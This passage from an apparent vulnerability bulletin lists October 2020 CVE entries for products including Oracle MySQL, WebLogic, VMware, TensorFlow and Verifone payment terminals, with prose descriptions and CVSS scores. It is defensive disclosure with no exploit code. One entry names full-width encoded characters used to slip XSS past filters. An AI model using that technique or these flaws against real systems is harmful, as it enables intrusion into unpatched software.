Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: NDBCluster Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Cluster accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 4.6 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14853
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14765
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14860
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14785
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14845
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14839
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14837
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14836
CONFIRM
MISC
oracle — peoplesoft_enterprise_global_payroll_core
 
Vulnerability in the PeopleSoft Enterprise HCM Global Payroll Core product of Oracle PeopleSoft (component: Security). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Global Payroll Core. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Global Payroll Core accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Global Payroll Core accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise HCM Global Payroll Core. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14778
MISC
oracle — peoplesoft_enterprise_peopletools
 
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14847
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14872
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14881
MISC
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14885
MISC
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14884
MISC
MISC
oracle — weblogic_server
 
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14883
MISC
oracle — weblogic_server
 
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14882
MISC
oracle –solaris
 
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14871
MISC
overwolf — overwolf
 
In the client in Overwolf 0.149.2.30, a channel can be accessed or influenced by an actor that is not an endpoint. 2020-10-16 not yet calculated CVE-2020-25214
MISC
parse_server — parse_server
 
Parse Server (npm package parse-server) broadcasts events to all clients without checking if the session token is valid. This allows clients with expired sessions to still receive subscription objects. It is not possible to create subscription objects with invalid session tokens. The issue is not patched. 2020-10-22 not yet calculated CVE-2020-15270
MISC
CONFIRM
MISC
phpredisadmin — N/A
 
phpRedisAdmin before 1.13.2 allows XSS via the login.php username parameter. 2020-10-16 not yet calculated CVE-2020-27163
MISC
python — python
 
In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP. 2020-10-22 not yet calculated CVE-2020-27619
MISC
MISC
MISC
MISC
MISC
MISC
qemu — qemu
 
An issue was discovered in QEMU through 5.1.0. An out-of-bounds memory access was found in the ATI VGA device implementation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati_2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service. 2020-10-16 not yet calculated CVE-2020-24352
MISC
MISC
rconfig — rconfig
 
rConfig 3.9.4 and earlier allows authenticated code execution (of system commands) by sending a forged GET request to lib/ajaxHandlers/ajaxAddTemplate.php or lib/ajaxHandlers/ajaxEditTemplate.php. 2020-10-19 not yet calculated CVE-2020-13778
MISC
MISC
reason — s20_ethernet_switch
 
The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow attackers to trick users into following a link or navigating to a page that posts a malicious JavaScript statement to the vulnerable site, causing the malicious JavaScript to be rendered by the site and executed by the victim client. 2020-10-20 not yet calculated CVE-2020-16246
MISC
red_hat — fabric8-maven-plugin
 
A flaw was found in the fabric8-maven-plugin 4.0.0 and later. When using a wildfly-swarm or thorntail custom configuration, a malicious YAML configuration file on the local machine executing the maven plug-in could allow for deserialization of untrusted data resulting in arbitrary code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-10-22 not yet calculated CVE-2020-10721
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b_4.003
 
An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with less bytes than required by the Key Format Table. 2020-10-19 not yet calculated CVE-2020-6084
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b_4.003
 
An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with less than 0x18 bytes following the Key Format field. 2020-10-19 not yet calculated CVE-2020-6085
MISC
sage — dpw_2020_06_x
 
An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. It allows unauthenticated users to upload JavaScript (in a file) via the expenses claiming functionality. However, to view the file, authentication is required. By exploiting this vulnerability, an attacker can persistently include arbitrary HTML or JavaScript code into the affected web page. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware. 2020-10-16 not yet calculated CVE-2020-26583
MISC
MISC
MISC
sage — dpw_2020_06_x
 
An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. The search field “Kurs suchen” on the page Kurskatalog is vulnerable to Reflected XSS. If the attacker can lure a user into clicking a crafted link, he can execute arbitrary JavaScript code in the user’s browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware. 2020-10-16 not yet calculated CVE-2020-26584
MISC
MISC
MISC
sage — easypay
 
Multiple stored cross-site scripting (XSS) vulnerabilities in Sage EasyPay 10.7.5.10 allow authenticated attackers to inject arbitrary web script or HTML via multiple parameters through Unicode Transformations (Best-fit Mapping), as demonstrated by the full-width variants of the less-than sign (%EF%BC%9C) and greater-than sign (%EF%BC%9E). 2020-10-18 not yet calculated CVE-2020-13893
MISC
MISC
sap — solution_manager_and_focused_run
 
SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an unauthenticated attackers to bypass the authentication if the default passwords for Admin and Guest have not been changed by the administrator.This may impact the confidentiality of the service. 2020-10-20 not yet calculated CVE-2020-6369
MISC
MISC
simple — download_monitor
 
SQL injection vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to execute arbitrary SQL commands via a specially crafted URL. 2020-10-21 not yet calculated CVE-2020-5651
MISC
MISC
simple — download_monitor
 
Cross-site scripting vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to inject an arbitrary script via unspecified vectors. 2020-10-21 not yet calculated CVE-2020-5650
MISC
MISC
solarwinds — n-central
 
SolarWinds N-Central version 12.3 GA and lower does not set the JSESSIONID attribute to HTTPOnly. This makes it possible to influence the cookie with javascript. An attacker could send the user to a prepared webpage or by influencing JavaScript to the extract the JESSIONID. This could then be forwarded to the attacker. 2020-10-19 not yet calculated CVE-2020-15910
MISC
MISC
solarwinds — n-central
 
SolarWinds N-central through 2020.1 allows session hijacking and requires user interaction or physical access. The N-Central JSESSIONID cookie attribute is not checked against multiple sources such as sourceip, MFA claim, etc. as long as the victim stays logged in within N-Central. To take advantage of this, cookie could be stolen and the JSESSIONID can be captured. On its own this is not a surprising result; low security tools allow the cookie to roam from machine to machine. The JSESSION cookie can then be used on the attackers’ workstation by browsing to the victim’s NCentral server URL and replacing the JSESSIONID attribute value by the captured value. Expected behavior would be to check this against a second source and enforce at least a reauthentication or multi factor request as N-Central is a highly privileged service. 2020-10-19 not yet calculated CVE-2020-15909
MISC
MISC
sprecher — sprecon-e_firmware
 
Sprecher SPRECON-E firmware prior to 8.64b might allow local attackers with access to engineering data to insert arbitrary code. This firmware lacks the validation of the input values on the device side, which is provided by the engineering software during parameterization. Attackers with access to local configuration files can therefore insert malicious commands that are executed after compiling them to valid parameter files (“PDLs”), transferring them to the device, and restarting the device. 2020-10-19 not yet calculated CVE-2020-11496
CONFIRM
spree — spree
 
In Spree before versions 3.7.11, 4.0.4, or 4.1.11, expired user tokens could be used to access Storefront API v2 endpoints. The issue is patched in versions 3.7.11, 4.0.4 and 4.1.11. A workaround without upgrading is described in the linked advisory. 2020-10-20 not yet calculated CVE-2020-15269
MISC
CONFIRM
strapi — strapi
 
admin/src/containers/InputModalStepperProvider/index.js in Strapi before 3.2.5 has unwanted /proxy?url= functionality. 2020-10-22 not yet calculated CVE-2020-27664
MISC
MISC
strapi — strapi
 
In Strapi before 3.2.5, there is no admin::hasPermissions restriction for CTB (aka content-type-builder) routes. 2020-10-22 not yet calculated CVE-2020-27665
MISC
MISC
strapi — strapi
 
Strapi before 3.2.5 has stored XSS in the wysiwyg editor’s preview feature. 2020-10-22 not yet calculated CVE-2020-27666
MISC
MISC
sylius — sylius
 
In Sylius before versions 1.6.9, 1.7.9 and 1.8.3, the user may register in a shop by email mail@example.com, verify it, change it to the mail another@domain.com and stay verified and enabled. This may lead to having accounts addressed to totally different emails, that were verified. Note, that this way one is not able to take over any existing account (guest or normal one). The issue has been patched in Sylius 1.6.9, 1.7.9 and 1.8.3. As a workaround, you may resolve this issue on your own by creating a custom event listener, which will listen to the sylius.customer.pre_update event. You can determine that email has been changed if customer email and user username are different. They are synchronized later on. Pay attention, to email changing behavior for administrators. You may need to skip this logic for them. In order to achieve this, you should either check master request path info, if it does not contain /admin prefix or adjust event triggered during customer update in the shop. You can find more information on how to customize the event here. 2020-10-19 not yet calculated CVE-2020-15245
MISC
CONFIRM
synapse — authrestservlet
 
AuthRestServlet in Matrix Synapse before 1.21.0 is vulnerable to XSS due to unsafe interpolation of the session GET parameter. This allows a remote attacker to execute an XSS attack on the domain Synapse is hosted on, by supplying the victim user with a malicious URL to the /_matrix/client/r0/auth/*/fallback/web or /_matrix/client/unstable/auth/*/fallback/web Synapse endpoints. 2020-10-19 not yet calculated CVE-2020-26891
MISC
MISC
CONFIRM
MISC
synk — synk
 
This affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function. 2020-10-21 not yet calculated CVE-2020-7750
MISC
MISC
synk — synk
 
This affects all versions of package osm-static-maps. User input given to the package is passed directly to a template without escaping ({{{ … }}}). As such, it is possible for an attacker to inject arbitrary HTML/JS code and depending on the context. It will be outputted as an HTML on the page which gives opportunity for XSS or rendered on the server (puppeteer) which also gives opportunity for SSRF and Local File Read. 2020-10-20 not yet calculated CVE-2020-7749
MISC
MISC
MISC
tensorflow — tensorflow
 
In Tensorflow before version 2.4.0, when the `boxes` argument of `tf.image.crop_and_resize` has a very large value, the CPU kernel implementation receives it as a C++ `nan` floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved. 2020-10-21 not yet calculated CVE-2020-15266
CONFIRM
CONFIRM
CONFIRM
tensorflow — tensorflow
 
In Tensorflow before version 2.4.0, an attacker can pass an invalid `axis` value to `tf.quantization.quantize_and_dequantize`. This results in accessing a dimension outside the rank of the input tensor in the C++ kernel implementation. However, dim_size only does a DCHECK to validate the argument and then uses it to access the corresponding element of an array. Since in normal builds, `DCHECK`-like macros are no-ops, this results in segfault and access out of bounds of the array. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved. 2020-10-21 not yet calculated CVE-2020-15265
MISC
MISC
CONFIRM
tibco — multiple_products
 
The Transaction Insight reporting component of TIBCO Software Inc.’s TIBCO Foresight Archive and Retrieval System, TIBCO Foresight Archive and Retrieval System Healthcare Edition, TIBCO Foresight Operational Monitor, TIBCO Foresight Operational Monitor Healthcare Edition, TIBCO Foresight Transaction Insight, and TIBCO Foresight Transaction Insight Healthcare Edition contains a vulnerability that theoretically allows an authenticated attacker to perform SQL injection. Affected releases are TIBCO Software Inc.’s TIBCO Foresight Archive and Retrieval System: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Archive and Retrieval System Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Transaction Insight: versions 5.1.0 and below, version 5.2.0, and TIBCO Foresight Transaction Insight Healthcare Edition: versions 5.1.0 and below, version 5.2.0. 2020-10-20 not yet calculated CVE-2020-9417
CONFIRM
tiki — tiki
 
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. 2020-10-22 not yet calculated CVE-2020-15906
MISC
MISC
tink — tink
 
A mis-handling of invalid unicode characters in the Java implementation of Tink versions prior to 1.5 allows an attacker to change the ID part of a ciphertext, which result in the creation of a second ciphertext that can decrypt to the same plaintext. This can be a problem with encrypting deterministic AEAD with a single key, and rely on a unique ciphertext-per-plaintext. 2020-10-19 not yet calculated CVE-2020-8929
CONFIRM
CONFIRM
ubuntu — ubuntu
 
In containerd (an industry-standard container runtime) before version 1.2.14 there is a credential leaking vulnerability. If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (otherwise known as a “foreign layer”), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x but not 1.3.0 or later, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers. If an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account. The default containerd resolver is used by the cri-containerd plugin (which can be used by Kubernetes), the ctr development tool, and other client programs that have explicitly linked against it. This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected. If you are using containerd 1.3 or later, you are not affected. If you are using cri-containerd in the 1.2 series or prior, you should ensure you only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected. 2020-10-16 not yet calculated CVE-2020-15157
MISC
CONFIRM
UBUNTU
UBUNTU
ucms — ucms
 
An arbitrary command execution vulnerability exists in the fopen() function of file writes of UCMS v1.4.8, where an attacker can gain access to the server. 2020-10-23 not yet calculated CVE-2020-25483
MISC
ucweb — uc_browser
 
User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb’s UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb’s UC Browser version 13.0.8 and prior versions. 2020-10-20 not yet calculated CVE-2020-7364
MISC
MISC
ucweb — uc_browser
 
User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb’s UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb’s UC Browser version 13.0.8 and prior versions. 2020-10-20 not yet calculated CVE-2020-7363
MISC
MISC
ucweb — uc_browser
 
User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the RITS Browser version 3.3.9 and prior versions. 2020-10-20 not yet calculated CVE-2020-7371
MISC
MISC
velero — velero
 
Velero (prior to 1.4.3 and 1.5.2) in some instances doesn’t properly manage volume identifiers which may result in information leakage to unauthorized users. 2020-10-22 not yet calculated CVE-2020-3996
MISC
verifone — mx900_series_pinpad_payment_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have a race condition for RBAC bypass. 2020-10-23 not yet calculated CVE-2019-14711
MISC
verifone — mx900_series_pinpad_payment_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow installation of unsigned packages. 2020-10-23 not yet calculated CVE-2019-14713
MISC
verifone — mx900_series_pinpad_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow multiple arbitrary command injections, as demonstrated by the file manager. 2020-10-23 not yet calculated CVE-2019-14719
MISC
verifone — mx900_series_pinpad_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have Insecure Permissions, with resultant svc_netcontrol arbitrary command injection and privilege escalation. 2020-10-23 not yet calculated CVE-2019-14718
MISC
verifone — pinpad_payment_terminals
 
Verifone Pinpad Payment Terminals allow undocumented physical access to the system via an SBI bootloader memory write operation. 2020-10-23 not yet calculated CVE-2019-14715
MISC
verifone — verixv_pinpad_payment_terminals
 
Verifone VerixV Pinpad Payment Terminals with QT000530 allow bypass of integrity and origin control for S1G file generation. 2020-10-23 not yet calculated CVE-2019-14712
MISC
verifone — verixv_pinpad_payment_terminals
 
Verifone VerixV Pinpad Payment Terminals with QT000530 have an undocumented physical access mode (aka VerixV shell.out). 2020-10-23 not yet calculated CVE-2019-14716
MISC
verifone — verixv_pinpad_payment_terminals
 
Verifone Verix OS on VerixV Pinpad Payment Terminals with QT000530 have a Buffer Overflow via the Run system call. 2020-10-23 not yet calculated CVE-2019-14717
MISC
vm-superio — vm-superio
 
In vm-superio before 0.1.1, the serial console FIFO can grow to unlimited memory usage when data is sent to the input source (i.e., standard input). This behavior cannot be reproduced from the guest side. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host. 2020-10-16 not yet calculated CVE-2020-27173
MISC
MISC
vmware — horizon_client
 
VMware Horizon Client for Windows (5.x prior to 5.5.0) contains an information disclosure vulnerability. A malicious attacker with local privileges on the machine where Horizon Client for Windows is installed may be able to retrieve hashed credentials if the client crashes. 2020-10-23 not yet calculated CVE-2020-3998
MISC
vmware — horizon_server
 
VMware Horizon Server (7.x prior to 7.10.3 or 7.13.0) contains a Cross Site Scripting (XSS) vulnerability. Successful exploitation of this issue may allow an attacker to inject malicious script which will be executed. 2020-10-23 not yet calculated CVE-2020-3997
MISC
vmware — multiple_products
 
In VMware ESXi (6.7 before ESXi670-201908101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x before 15.1.0), Fusion (11.x before 11.1.0), the VMCI host drivers used by VMware hypervisors contain a memory leak vulnerability. A malicious actor with access to a virtual machine may be able to trigger a memory leak issue resulting in memory resource exhaustion on the hypervisor if the attack is sustained for extended periods of time. 2020-10-20 not yet calculated CVE-2020-3995
MISC
vmware — multiple_products
 
OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution. 2020-10-20 not yet calculated CVE-2020-3992
MISC
vmware — multiple_products
 
VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds write vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this vulnerability to crash the virtual machine’s vmx process or corrupt hypervisor’s memory heap. 2020-10-20 not yet calculated CVE-2020-3982
MISC
vmware — multiple_products
 
VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds read vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process. 2020-10-20 not yet calculated CVE-2020-3981
MISC
vmware — nsx-t
 
VMware NSX-T (3.x before 3.0.2, 2.5.x before 2.5.2.2.0) contains a security vulnerability that exists in the way it allows a KVM host to download and install packages from NSX manager. A malicious actor with MITM positioning may be able to exploit this issue to compromise the transport node. 2020-10-20 not yet calculated CVE-2020-3993
MISC
vmware — vcenter_server
 
VMware vCenter Server (6.7 before 6.7u3, 6.6 before 6.5u3k) contains a session hijack vulnerability in the vCenter Server Appliance Management Interface update function due to a lack of certificate validation. A malicious actor with network positioning between vCenter Server and an update repository may be able to perform a session hijack when the vCenter Server Appliance Management Interface is used to download vCenter updates. 2020-10-20 not yet calculated CVE-2020-3994
MISC
webpack-subsource-integrity — webpack-subsource-integrity
 
In webpack-subresource-integrity before version 1.5.1, all dynamically loaded chunks receive an invalid integrity hash that is ignored by the browser, and therefore the browser cannot validate their integrity. This removes the additional level of protection offered by SRI for such chunks. Top-level chunks are unaffected. This issue is patched in version 1.5.1. 2020-10-19 not yet calculated CVE-2020-15262
MISC
MISC
CONFIRM
wire — wire
 
In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL’s protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory. 2020-10-16 not yet calculated CVE-2020-15258
MISC
MISC
